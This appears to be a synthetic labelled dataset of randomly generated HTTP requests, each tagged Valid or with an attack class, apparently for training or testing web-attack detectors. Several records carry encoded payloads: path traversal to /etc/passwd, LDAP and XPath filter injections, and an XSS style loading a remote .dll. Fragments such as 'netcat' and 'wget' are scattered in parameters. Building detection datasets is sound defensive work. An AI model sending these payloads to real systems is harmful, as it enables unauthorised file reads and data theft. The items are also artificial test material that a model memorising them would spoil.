Warning: 869 www.s98uEo.css "er1dzcr" 
X-Forwarded-For: 86.196.76.2
X-Serial-Number: 202713931770679449
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14337
Start - Id: 37630
class: LdapInjection
PUT /hWJJ0Btq/RfvY/np/OM3shutdownQ1Krq1-/i1Yfp0_COqyTiQL/oQHWbavR0.html? HTTP/1.1
Content-Length: 85
Content-Language: an0iodi,2izm7
Content-Encoding: deflate
Content-Location: http://eyluir.it/na74ihM.png
Content-MD5: NGFtMnJvb3NuZXdnanVldQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 22 Jun 08 18:04:36 GMT
Last-Modified: Tue, 27 Jul 04 09:11:38 GMT
Host: 162.50.66.118:47788
Connection: close
Accept: application/zip;q=0.0, audio/*;q=0.7
Accept-Charset: iso-8859-5
Accept-Encoding: *;q=0.6
Accept-Language: *
Cache-Control: no-cache
Client-ip: 236.109.120.226
Cookie: unionmochaIdMJU0position=+ipsoew>0t2ecAr;ebrofte25atv=9OaI
Cookie2: $Version="477"
Date: Mon, 13 Sep 04 18:05:42 UTC
ETag: "UasEgXZAUoa8Yhw8"
Expect: 100-continue
From: yhSsf@ahrg7dbN.com
If-Modified-Since: Fri, 01 Jul 05 04:32:49 UTC
If-Unmodified-Since: Sat, 24 Dec 05 03:52:41 CET
If-Match: "bhbbKh8reMkrOEpvhI3q"
If-None-Match: "d@TxHOwdxQ_BaLeX6u"
If-Range: *
Max-Forwards: 60
MIME-Version: 8.8
Pragma: no-cache
Proxy-Authorization: Basic aXJ0d2E6cmVtaA==
Authorization: Basic QWFvZzptUmFwZGk=
Range: -6153,297-,439-473
Referer: http://www.oqzalios.st/nieEcat/tlvst/mtiel5oe/e1iEse.mdb
TE: trailers,chunked;q=0.0
Trailer: If-Modified-Since
User-Agent: maL0rozat
UA-CPU: MIPS
UA-Disp: 2548,1743,32
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 4356x362
Via: HTTP/1.3 www.fnbnled.js, 3.7 247.245.41.81
Transfer-Encoding: gzip
Upgrade: 1obltA/1.6, begaf/4.9, aje/5.5
Warning: 290 www.csV7.jpg "alupzEldm3wn" 
X-Forwarded-For: 20.191.23.124
X-Serial-Number: 220877773
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

@GIBkj0execQPtq=hloewqwin9i&7slhTree6XnJ=ian8)(&(objectClass   =   E2ro*)

End - Id: 37630
Start - Id: 29883
class: Valid
GET /muYkCx9l@gFB@eAleDY/nqzjpw/uM1eGH7PttbJ0er/ri0ntMzfuosholN6F/7esaTPnrh/taenzLr7kuG/.8yshutdownHRP/2w3tefsbjoaa0dte/33ei7VCTnetcatscript/Cssf1jlet.css?gmjg=wF-47vZVDGL3&4tiEreLtu1i=4966674&PDimg@inimg=4409&ilwsn=twAfotiueAwrs1f&Nin=it%28t&AgNformErw=cnh HTTP/1.1
Host: 5.162.155.191
Connection: nrushehg
Accept: */*
Accept-Charset: koi8
Accept-Encoding: 
Accept-Language: qhlls-lehrtea;q=0.5, riaaah-m9h5, tpleesen-o;q=0.7
Cache-Control: 3on6O=ee
Client-ip: 214.124.111.84
Cookie: oxr7sdosetnsa=wihibfns ;9uiUfudrsne=heEAsjtxias4rm;nhoeiiHlae=tlxnph-feeq0dyvqr
Cookie2: $Version="8"
Date: Fri, 20 Apr 07 18:54:28 CET
ETag: W/"LOK2IG.-fhGIhMW2gy"
Expect: ioat=tibft
From: enhtcy2@oriacunyla.com
If-Modified-Since: Thu, 20 Mar 08 10:17:15 CET
If-Unmodified-Since: Thu, 13 Oct 05 22:15:31 UTC
If-Match: "1zxJaNfmFwiXmnnVI"
If-None-Match: "q6_4Jlwq@USkMEQ"
If-Range: Sun, 19 Feb 06 01:04:14 CET
Max-Forwards: 568
MIME-Version: 7.6
Pragma: Nhss97='60s6zf'
Proxy-Authorization: meaud m7h0u=nztdpF
Authorization: Digest qop=torc
Range: 71-
Referer: /L1Hedsai/rAsEOv4t/seiElawn/5wfnvo.exe
TE: chunked;q=0.0,deflate;q=0.1,deflate;q=0.1
Trailer: Transfer-Encoding
User-Agent: 9EBHPO http://www.rI0e.be
UA-CPU: Sparc
UA-Disp: 754,5719,16
UA-OS: Win98
UA-Color: color16
UA-Pixels: 4730x789
Via: 9.3 www.nwaast.htm, FTP/2.3 90.227.197.11, HTTP/5.8 www.Ii4e.shtml
Transfer-Encoding: compress
Upgrade: rens/6.9
Warning: 039 www.exmwec.shtml "dmksdpeslltzeswra" "Tue, 13 Apr 10 24:10:46 CET"
X-Forwarded-For: 255.72.182.148
X-Serial-Number: 615013754882533
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29883
Start - Id: 36342
class: PathTransversal
GET /yefWtst/gjnU/feAltLsohd9uaepaanrg/eodde9ktinpheeli/stdinYpkmeIL8access_log-p7/rzx/70nm/e2muijattc/dmTzAdlehotl/TlhTrld6rbc72Irs9i/teX.HqOMZ0aSLW80NLEn.tiff?IB8Vw=065&Eiytrigzoa3=ifr&ZZVpTf=239085255&uilaisnniUo=accS&pen5yt3eesarE=ori7s%2Bytoegewve&teIme=85176648&tsnyieoat=7ohyt&laroxett=eBmYRhdcm&l5=%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2Fpasswd%2500.html&4l8doeqEomnx17e=HekTrstRn&y8mail0dM.=%26ke&qo0okersn=ergdefBs&n33t.fWIdRo=Ilncr&3nOe=22 HTTP/1.1
Host: www.2cdx4ti0.org
Connection: close
Accept: text/xml;q=0.9, image/*;q=0.5
Accept-Charset: *;q=0.5
Accept-Encoding: compress;q=0.8
Accept-Language: *;q=0.0
Cache-Control: no-cache
Client-ip: 59.25.255.93
Cookie: e1nndsnh7gein=9srg46_RRT;laobjectn_9kZ2mN=ntcar;achrqYstdsoeais=3841;rnadhtAgetzen=oTrHahnaOarEsi;obghuvwcEftL=nne
Cookie2: $Version="08"
Date: Mon, 22 Jan 07 02:35:27 GMT
ETag: W/"wczlowywPCBmVlM"
From: emtam@9Sfe.uk
If-None-Match: *
If-Range: *
MIME-Version: 0.4
Pragma: j='sbtemria'
Proxy-Authorization: Digest cnonce="47it"
Range: 6-770122
Referer: http://gsumZ.cz/scizrj9/tihaiqaa/6lPIesee/Twxter0R.jsp
Trailer: From
User-Agent: Mozilla/6.2 (compatible; MSIE 9.2; Mac OS X; srufdj)
UA-CPU: x86
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 636x8824
Via: yevfed/6.1 150.195.89.202
X-Forwarded-For: 217.52.49.74
----: ------------------------------------

null

End - Id: 36342
Start - Id: 15408
class: Valid
GET /misDndjCInfij/LJjS2C@6C@ZHaccess_log/DHcNall5_db_qr/3s/-w8P5fobjectpBq/sPqOMif4CiBk5mt.shtml? HTTP/1.0
Host: 41.141.136.98
Connection: mDebohq
Accept: video/mpeg;q=0.5
Accept-Charset: x-mac-chinesesimp;q=0.7, macintosh, x-mac-japanese;q=0.4, iso-8859-8-i;q=0.2
Accept-Encoding: *;q=0.1
Accept-Language: C-uwy;q=0.2
Cache-Control: no-cache
Client-ip: 90.204.112.5
Cookie: FPLwsnyNz0ee=81l3;gaptmoemeESais=62917;oT8hhiSmywhcm=ncerlThomefA7priha;dSf1=aGPuLgDr;nn7aeoee=qfboZPb4Le;xsrim0=|L e
Cookie2: $Version="39"
Date: Wed, 10 Oct 07 21:19:35 GMT
ETag: W/"F4a.zqzD89KffrK4sljN"
Expect: 100-continue
From: hreEo@mhtthLrava.org
If-Modified-Since: Thu, 12 Jul 07 05:54:27 GMT
If-Unmodified-Since: Wed, 06 Oct 04 24:55:24 GMT
If-Match: "@KvJRMBRRh89wSrz"
If-None-Match: *
If-Range: "WA@nZ@MVBp7NvASok"
Max-Forwards: 3581
MIME-Version: 7.9
Pragma: no-cache
Proxy-Authorization: eeaeg nrstl=TnFalO8t
Authorization: Digest algorithm=dnoYbcg
Range: 9-62,54186-,361-
Referer: http://rwHotjsu.cz/emeu7Nel/ibnprehp/areAntS2/l8eaer.avi
TE: deflate,trailers,trailers
Trailer: Connection
User-Agent: Mozilla/0.6 (compatible; Konqueror/6.1; Open BSD i586; etnasi)
UA-CPU: 68000
UA-Disp: 8723,427,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 5103x7782
Via: 0.3 www.h9Itpo.shtml, FTP/6.1 124.73.49.41, 2.2 www.q0en.html
Transfer-Encoding: compress
Upgrade: dAn/4.5, 3mn4ds/7.1, gos/5.5, zcote/1.9, sxOwze/3.3
Warning: 254 www.nm4da.htm "TP6YSIy4aedfshhw" 
X-Forwarded-For: 76.40.16.131
X-Serial-Number: 62076260376373
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15408
Start - Id: 35613
class: XPathInjection
GET /e4friutAddi31jsbvnhs/eqvLvUoM/hSebzZtRvaew/n8uk3atdc8/K5f0u_bgsoundcer/8_T4PGtgMRHM.9.sh?7dOI=s&eire=20162220&TMincludeT=52044&ssurrhrtoAvtLeN=orda%3ASseNh&t7ia1s2zev=rSalteh&arteosairrznewp=23&6gereiytiheei=7&obqtmtE=dtelcp8xrtt1inO&4icepf=selecti&Rb8eo915=tta4tu&ofcoFsitdsiia=iLru&epIHo=tanf&kSRjMunionGIc=lyfrc&t7v4-baEv=ei9ttke%27%5D+++%7C+P++++%7C+%2F%2Fuser%5B+name%2Ftext%28+%29+%3D++%27de&i6jhuNae=53933 HTTP/1.0
Host: 203.2.42.160
Connection: keep-alive
Accept: application/postscript, application/postscript, video/*
Accept-Charset: *;q=0.6
Accept-Encoding: gzip;q=0.2
Accept-Language: Cf-Qn;q=0.1, sewem4e-gwgtr
Cache-Control: min-fresh=6799
Client-ip: 101.51.218.73
Cookie: afTm=62;aetsrhef04=tVQEw-HML;teea=e4Doj5C1FvKo;So-p=8gEfg0ae;mksbjc7DSw=eat;it;rumsnes5o5ers=pM8
Cookie2: $Version="102"
Date: Sat, 07 Nov 09 04:37:32 GMT
ETag: "yveLgmdxNwRjS_so3"
Expect: ioh3hbt
From: elnasan@dnyeHdoyd.be
If-Modified-Since: Mon, 04 Aug 08 07:36:35 UTC
If-Unmodified-Since: Wed, 21 Apr 10 07:05:58 CET
If-Match: *
If-None-Match: *
If-Range: Tue, 06 Dec 05 05:57:20 CET
Max-Forwards: 058
MIME-Version: 4.8
Pragma: 1=Uampieam
Proxy-Authorization: Basic c3l0ZWVBdDI6YU5paXRm
Authorization: Digest nonce
Range: -430
Referer: /ethenu/eeeeaoI.sh
TE: gzip,chunked,trailers
Trailer: Host
User-Agent: scnridmO/1.8.7.2
UA-CPU: x86
UA-Disp: 458,730,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 138x439
Via: 3.2 www.shu3.tiff, 3.2 77.225.162.4:7981
Transfer-Encoding: gzip
Upgrade: sivn/3.0
Warning: 642 225.30.125.246 "ai7adc" 
X-Forwarded-For: 163.147.115.220
X-Serial-Number: 65275952070459353
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35613
Start - Id: 16549
class: Valid
GET /iancenTio5daccg/E_Gjb56inserta1/eHT/erinnl1taEejaEnaou.jpg?iFrrsakpn=%28iamm%40ilhadai&pbnoNgtbya=6&9dtdnrwEbiinml=275521&dBEN=85377&eW8qekidahed=1406&lYej4o=528&strooaatqvot=2868332109&DPCU-8_Xlike17=3&wdateaKyo=1edrThndh5&rtEnknrsolz=hv_jjkcFsb HTTP/1.1
Host: 73.226.38.228
Connection: close
Accept: */*;q=0.3
Accept-Charset: iso-8859-3, windows-1252;q=0.2, ks_c_5601-1987;q=0.2, utf-8
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 110.75.170.196
Cookie: @jNUx_=%]aOw93Rdr;ovt=svLx5luI4N5z;7wesuo=4
Cookie2: $Version="6"
Date: Wed, 05 May 04 11:48:47 UTC
ETag: W/"tbbxWf8euU2lA2q61VUP"
Expect: 6otl
From: o7mnatoB@rrengt.ch
If-Modified-Since: Sun, 17 Feb 08 05:44:04 CET
If-Unmodified-Since: Fri, 31 Aug 07 20:54:31 CET
If-Match: *
If-None-Match: *
If-Range: Sat, 11 Mar 06 22:55:02 GMT
Max-Forwards: 1087
MIME-Version: 3.0
Pragma: dtKahuo='hvm'
Proxy-Authorization: Digest qop=itaaniiM
Authorization: Digest opaque="0eeimsg"
Range: -098113
Referer: /ecie/5emus7/mushth/mmltose.php4
TE: trailers
Trailer: If-Range
User-Agent: Mozilla/3.9 (Machintosh; U; PPC Mac OS X 4.4; ar-tY; rv:9.1.0) Gecko/17588750
UA-CPU: x86
UA-Disp: 2808,9760,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 9430x4545
Via: FTP/8.6 www.edxec.png
Transfer-Encoding: gzip
Upgrade: yru/2.9, iNeed/4.4, EOio/3.5, a5xeU/5.9, 5omle/9.1
Warning: 574 www.ragnqoh.htm "mte2te" 
X-Forwarded-For: 184.226.48.9
X-Serial-Number: 4070028617537255
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 16549
Start - Id: 27665
class: Valid
GET /hedumTlieE/decmtzcimr/u2icohoyjds3rl1n/tsio7esurna/pstrsriotatzuehdmqi/5bojVcZ/8-GyKBDr.asmx?hMesuosE=30837&bodyhZhj@lp=nyo&dmEna6RVoqam=fwnDdocumentzwget+e0lthttp%286&slnnnWle=63&da7ntsaTeitj=naJuxH&kle3moczaguIe=rVLE14uZ&-tAf5EyftpT=ens7nseporsti4us&eelgt=97635088&3ljrm=e2EarusrieHb&tr=qod%4044eit39&wrmeaanhsn1ert=li HTTP/1.1
Host: www.ru3rht.st:80
Connection: mtrIiw
Accept: image/*;q=0.8, audio/basic;q=0.2
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: ihu-RgnS9eg, id-hi;q=0.3, sUi-oNyeale, rtut6e-e;q=0.9
Cache-Control: no-transform
Client-ip: 163.33.169.243
Cookie: nssSnhae=GLo %<lj]position;Nebfwoilthroan=16896;uha=dcxp_eh70e~z dd)sna;ceiaZ=52410;htse=0417384254
Cookie2: $Version="5"
Date: Wed, 09 Nov 05 12:39:54 GMT
ETag: ".0HZLsvWECLFYqDWWN.f"
Expect: 100-continue
From: nht6ua@sAi6ici.biz
If-Modified-Since: Wed, 12 Apr 06 14:00:33 UTC
If-Unmodified-Since: Tue, 19 Jan 10 24:06:03 GMT
If-Match: "ohF7L91F14TZ8F3dunK"
If-None-Match: *
If-Range: Thu, 24 Dec 09 11:01:58 GMT
Max-Forwards: 8
MIME-Version: 5.5
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: Basic bHQzc1I6ZXMzcg==
Range: 032-,0-,016038-
Referer: /ciirerlI/teeelaat.dll
TE: trailers,trailers
Trailer: If-Modified-Since
User-Agent: ofchRNnTd6NHoxwnu
UA-CPU: MIPS
UA-Disp: 2945,887,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 164x477
Via: FTP/4.0 186.149.133.102:606, 1.2 www.zd6nwi0s.css, HTTP/1.9 www.mernnng.tiff
Transfer-Encoding: gzip
Upgrade: wwAt/6.8, car6/9.6, wu9u/2.0
Warning: 507 5.156.224.31 "lste6eure" "Wed, 20 May 09 14:41:31 UTC"
X-Forwarded-For: 255.98.39.97
X-Serial-Number: 17920523075405
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27665
Start - Id: 30126
class: Valid
GET /ipmEQ7msHtk/ihwp/Tptenafwtess/0o/ax/nPT/Soc0eeueihn8Z.js?TVL_l3R9k.=naburkeeaaew0&5logQA=hTphp7goi3ou+7es4rst&et0slfuee0eAisd=6739&bfpARUUxTZ=telers2ynts&nnsozapz=59 HTTP/1.0
Host: www.cA6mr4.com
Connection: close
Accept: video/mpeg, audio/x-wav;q=0.9, application/zip
Accept-Charset: *
Accept-Encoding: *;q=0.8
Accept-Language: *
Cache-Control: min-fresh=4
Client-ip: 216.196.168.33
Cookie: CT9o7=tdeleterf;SIeoKbGhttpB=exxdjy-KlnrL;fmdBte=tanvhihdoiitv;Stsazsso5=4729286;fAi=style%5D5+I%26rpn%3Ferd%26rcpptt;ku1ARUD%ufCWD=5162809
Cookie2: $Version="729"
Date: Sun, 07 Nov 04 18:20:16 CET
ETag: "K2aUpoup.-7XH6viZY"
Expect: gdnE=peheesa
From: aolte3O@7ltytl.cz
If-Modified-Since: Sat, 09 Jun 07 22:55:36 CET
If-Unmodified-Since: Sun, 25 Jun 06 21:00:58 GMT
If-Match: "T1JjdutVjY8vQLF"
If-None-Match: *
If-Range: Tue, 18 Sep 07 24:23:36 UTC
Max-Forwards: 874
MIME-Version: 1.8
Pragma: 5etwl='ulo'
Proxy-Authorization: NTLM c3RZbmdoanF0Vm1RYmlhb2ttd3J0b3NuZWtzbHJiaG5vbWFuNGxv
Authorization: ehidi 2onrer=eduna
Range: -3400,603295-
Referer: /roccce.mspx
TE: gzip
Trailer: Upgrade
User-Agent: nU-fp-wT http://www.etTOsn.it
UA-CPU: Sparc
UA-Disp: 834,9850,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 146x988
Via: pfaerO/6.1 77.96.13.193, FTP/7.4 82.169.61.152
Transfer-Encoding: j0hs; dOumer=e0eta
Upgrade: atUnh/6.9, c0y/8.9, Tr3Ld/2.0, m2seTE/9.9, df38/8.9
Warning: 419 134.75.220.213:3618 "tmoeaaern" 
X-Forwarded-For: 46.52.217.2
X-Serial-Number: 56155
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30126
Start - Id: 45039
class: PathTransversal
PUT /e2ic/eWZ/nosngsahagyEaqcs3/ab_i/sgv.sh? HTTP/1.0
Content-Length: 240
Content-Language: cv
Content-Encoding: compress
Content-MD5: bHJ0YW80bzV0SmE4ZXFzOQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 24 Jun 04 22:00:58 GMT
Last-Modified: Thu, 22 Dec 05 07:44:06 UTC
Host: www.io5hauhcth.com
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: *;q=0.1
Accept-Encoding: deflate;q=0.8, deflate, gzip, gzip;q=0.4, deflate
Cookie: wsamp9=doc(  file:///c:/cS6/hplTp9i.xml  );id8=g(Hbgsound 
Date: Fri, 29 Oct 04 03:33:05 UTC
Expect: te3se0g
If-Modified-Since: Sun, 20 Nov 05 21:54:41 UTC
If-Match: *
If-None-Match: "jNbBRuTaJiq-xH41mfCz"
Max-Forwards: 84
Proxy-Authorization: Digest nonce
Referer: /tre0iwll/hrasoqrs/rSsiws/brta/eeBevybo.pdf
TE: trailers,chunked,trailers
User-Agent: Mozilla/1.2 (Machintosh; U; Mac OS X 7.4; wn-io; rv:3.8.2) Gecko/29677437
UA-OS: Win98
Via: HTTP/2.1 198.217.33.154, 8.0 222.57.168.96
Transfer-Encoding: deflate

qci=o2xasdthIIn&nhewod=PknMdrIdaf8&Y.s-2wMscriptG=nacceptsr<ro;rQa&1ghazamnte5ve=97905847&jdaceioaby=euHa&id40N8dfVnetcat=oa&Nd=808&Ui=oTattilsn&5h= B&tei8o7TdE0ateq=+tilduYt[2ota&pT=980846117&giyaa=4li&mexfhsd=nsiathwvhrn&Ssesf=sGy

End - Id: 45039
Start - Id: 6584
class: Valid
POST /Anarp/qc5ouhadpx/rftCnr9msn/axs/x5gszes/u1QwgetWs.gif? HTTP/1.0
Content-Length: 204
Content-Language: Hlitxonh,gi3ll4,uejeiol
Content-Encoding: identity
Content-Location: /id8hr/Ndhrsa/yi6ttmg.aspx
Content-MD5: YXR0ZWFlZW5laGVub2hvYw==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 16 Apr 07 01:53:04 GMT
Last-Modified: Wed, 18 Oct 06 24:47:23 CET
Host: 174.71.38.195
Connection: close
Accept: */*
Accept-Charset: iso-10646-ucs-2;q=0.5, iso-8859-4, hz-gb-2312, iso-2022-jp;q=0.0
Accept-Encoding: compress
Accept-Language: rrmr-5fap;q=0.6, istero-ndt2rtba;q=0.7, ro850-llioevpn;q=0.4
Cache-Control: only-if-cached
Client-ip: 131.199.136.16
Cookie: udeld=5/r
Cookie2: $Version="22"
Date: Wed, 28 Oct 09 01:14:25 CET
ETag: "PklWpNlfHEGNIO91tCgt"
Expect: n7oemese
From: a5yto@mejtrtseta.ch
If-Modified-Since: Wed, 12 Sep 07 14:07:36 CET
If-Unmodified-Since: Sun, 21 Nov 04 10:41:04 CET
If-Match: *
If-None-Match: "aArBDRcFOB@_YSp"
If-Range: *
Max-Forwards: 8
MIME-Version: 9.1
Pragma: dk8tihcn=d8nioae
Proxy-Authorization: Basic c2RuSzpzb29ldW1zcg==
Authorization: Basic Y2VodDprcmlMVGFPdA==
Range: 2-6822,68-376,4656-
Referer: /toado/isaee.asmx
TE: gzip;q=0.8,deflate
Trailer: Authorization
User-Agent: kQr96I http://www.9mse.fr
UA-CPU: x86
UA-Disp: 0239,483,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 2928x871
Via: kernro/4.9 250.56.157.16:00
Transfer-Encoding: identity
Upgrade: Goe/5.4
Warning: 015 www.S3hmat.js "rob00sy0uro5tLiaSgoN" 
X-Forwarded-For: 75.123.215.86
X-Serial-Number: 552358
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

YtTXWMN=rrlzIcX&sgahr=29474&jru_in9G=rn4eRei&ca7=laf2m&eengsoTbse0=czt&o1trsadpeo=79812&eleN=s-i&5yjTshlHe5ar=9978898334&img1wp-vimWQ=o &tisqtvvPht3hcc=8853&gm1Y0=0171754&dubbiet=gZHI7P&bER2Wy9=fQDdV2dnD.

End - Id: 6584
Start - Id: 47994
class: XSS
GET /-mf0NcaVFAUkr86/ndGeeehw7od.swf?7Ue@pPpO=%3Cdiv+++++style+%3D++%22+++++behaviour%3A+++++url%28%5Bhttp%3A%2F%2Fwww.nt.com%2Fscript%2Fmo.dll%5D%29%3B+++++%22++++%3E&eeyb=735128&srbESisDla=816211651&sh=33423560&oeeCsrekN=oKqqy2h&C6Jwgetqlii=aCaeieH&kdEibed4otYN=mc%7EuRaiito HTTP/1.0
Host: 139.161.137.217:66
Connection: keep-alive
Accept: */*
Accept-Charset: cp-932;q=0.5, x-mac-ce;q=0.3, iso-2022-kr, utf-7;q=0.8, euc-jp
Accept-Encoding: *;q=0.6
Accept-Language: *;q=0.4
Cache-Control: max-age=90323
Client-ip: 200.176.81.45
Cookie: cweeoney=711
Cookie2: $Version="01"
Date: Fri, 04 Sep 09 17:55:56 GMT
ETag: "-9gzcYVJS5LQoj3kt1"
Expect: tuecaeh
From: n25cwrN@ae4ttib.uk
If-Modified-Since: Wed, 25 Feb 09 07:01:43 UTC
If-Unmodified-Since: Wed, 07 Mar 07 04:14:47 CET
If-Match: *
If-None-Match: "Ls_CRKSN.YPAAr9X8vt"
If-Range: Sun, 14 Oct 07 02:29:04 GMT
Max-Forwards: 63
MIME-Version: 0.9
Pragma: Nsomgt='r'
Proxy-Authorization: Digest nc=b2c271ed
Authorization: Basic SWVuN2RuOjNoeWFtZXNl
Range: 209-45720
Referer: /et82ihhr.gz
TE: gzip;q=0.7,trailers,trailers
Trailer: User-Agent
User-Agent: tsykG7 http://www.a46nbyso.net
UA-CPU: 68000
UA-Disp: 491,839,8
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 480x167
Via: 0.1 www.etsedn.tiff
Transfer-Encoding: identity
Upgrade: ujou/5.1, doRY4j/6.5, hEhh/2.5, uoids3/2.1, iawl/7.3
Warning: 549 www.7tn2ri.jpg "cr4ayetrlreo6ceei3r" 
X-Forwarded-For: 62.26.34.68
X-Serial-Number: 44433169110
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47994
Start - Id: 49612
class: XPathInjection
GET /f-0WKT1Rk4pVZ4m/lH2z69nrC/9t/ioUtaoi3elpigej/teghose.sh?Ottejeto2peE=nS_Kfa&uumeeAnjt5om=eey%27+++or+%28i+%3C+count%28ndtois%2Fchild%3A%3Atext%28%29%29++and+++j++%3C+++count%28rpsrd%2Fchild%3A%3Acomment%28%29%29+and++++k+++++%3C+++count%28Kfsm%2Fchild%3A%3A*%29+%29+++or++++%270ezAsa%27+%3D+%27+++ueqs7h%27+++++or&ogholtoytSoeh=btejartmq&awb8di4=4702&eCns5dhTtiteu6=ooT&myKd=dtYIddie HTTP/1.0
Host: 203.138.232.154
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: gzip;q=0.6, compress, identity;q=0.4, identity;q=0.9, compress;q=0.4
Accept-Language: *;q=0.6
Cache-Control: max-stale
Client-ip: 124.225.114.247
Cookie: yes=haincludedas;yttmiit=28133446;EnnfeS=dehAhym44si
Cookie2: $Version="4"
Date: Sun, 13 Jun 04 21:33:19 GMT
ETag: W/"baj@.7Mq2NB-WyuTN"
Expect: 100-continue
From: b3Tsmet@oiiienq.de
If-Modified-Since: Fri, 18 Mar 05 11:06:54 UTC
If-Unmodified-Since: Mon, 31 Oct 05 17:37:20 GMT
If-Match: "T.1cbwN9_jWIQdxk"
If-None-Match: *
If-Range: Tue, 05 Oct 04 05:56:11 UTC
Max-Forwards: 195
MIME-Version: 5.6
Pragma: no-cache
Proxy-Authorization: NTLM bGN0bmlwc25pbjdicmlkNW10ekFjZXRuYWxhdWVpZWVo
Authorization: NTLM ZW9jZWdlYXQzaWVGYmFqZW9udDZnZm9pNXJhcjR4Y0Rpc3VT
Range: 7852-
Referer: /rtiimt/goelhtm.mspx
TE: deflate;q=0.4
Trailer: Accept-Charset
User-Agent: othas (nzOb6ZjrUQ; e6rcdp; uuzs99Rzg; rJlrMBKBc; 8cROpOm)
UA-CPU: Sparc
UA-Disp: 1997,806,16
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 3223x940
Via: 0.2 www.Sdwie.jpeg, 0.9 www.atittal.jpeg, jaRAw/6.4 204.122.228.249:3
Transfer-Encoding: identity
Upgrade: add/2.5
Warning: 885 www.nan6nedo.jpeg "UhOln0iubuetrq" 
X-Forwarded-For: 94.116.73.204
X-Serial-Number: 9696710
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49612
Start - Id: 37214
class: LdapInjection
GET /u25i7cceidhyqUi6sie/tWLORi7/nyTvlelyeL/hcf5fYIvW/wiottlta3iedche9dakv/6UJtdhrbI_kEpYcYsE7/fdceartT2.js?hrearnrh9=t%40HKAi3U8RL&utcrybusupuaaFd=232325&rrotbcmc0ssnee=yVieBf8LjZpL&seoldahhnrp=tiiolrfdaRulm&iukpted=42&mgnael=gne15%29%28%26%28objectClass+++%3De5*%29 HTTP/1.0
Host: 20.115.3.154:18
Connection: miaen9
Accept: application/rtf;q=0.5, image/gif;q=0.4
Accept-Charset: *
Accept-Encoding: *;q=0.1
Accept-Language: 2-adxn;q=0.4, nhns47oi-ukycua;q=0.1, oy-645t, thhuuan-efpV1sae;q=0.0
Cache-Control: no-cache
Client-ip: 236.64.159.239
Cookie: rvtzacoidtce=fqwZKBw0x8;evtEoeepa2TOp=558601351
Cookie2: $Version="284"
Date: Wed, 23 Mar 05 03:25:46 GMT
ETag: W/"nGU3RVy8tOKIK4L"
Expect: 100-continue
From: bttylert@dlnrhsoe.org
If-Modified-Since: Thu, 06 Dec 07 04:50:22 UTC
If-Unmodified-Since: Sun, 25 Apr 10 23:03:03 GMT
If-Match: "N0LriiexRWeJ_Iu6iT"
If-None-Match: *
If-Range: "SUS54Aa3aDtAyf8_4E"
Max-Forwards: 2149
MIME-Version: 2.5
Pragma: 5Psnuut='iawaails'
Proxy-Authorization: Digest realm
Authorization: Basic ZWxiNTpydDMw
Range: -906
Referer: http://mriy.gov/nrheA/v7LesOx0/lrmfm4/atguqg.mdb
TE: trailers
Trailer: Max-Forwards
User-Agent: Mozilla/6.9 (Windows; U; WinNT 3.0; ws-Ho; rv:4.3.1) Gecko/16204652
UA-CPU: Sparc
UA-Disp: 4047,0109,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 0874x8291
Via: FTP/5.4 www.m9rtzhn.jpg, 3.3 139.27.23.30, 1.3 80.178.67.6
Transfer-Encoding: gzip
Upgrade: etyvet/1.7, 9mEHd/4.9, saaq/1.8, 9irhSi/8.2, ooten3/4.3
Warning: 553 www.Nftmdh.html "rnvarnu59oDgV" "Mon, 31 Oct 05 08:57:55 UTC"
X-Forwarded-For: 217.7.45.94
X-Serial-Number: 973297601016037015
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37214
Start - Id: 27935
class: Valid
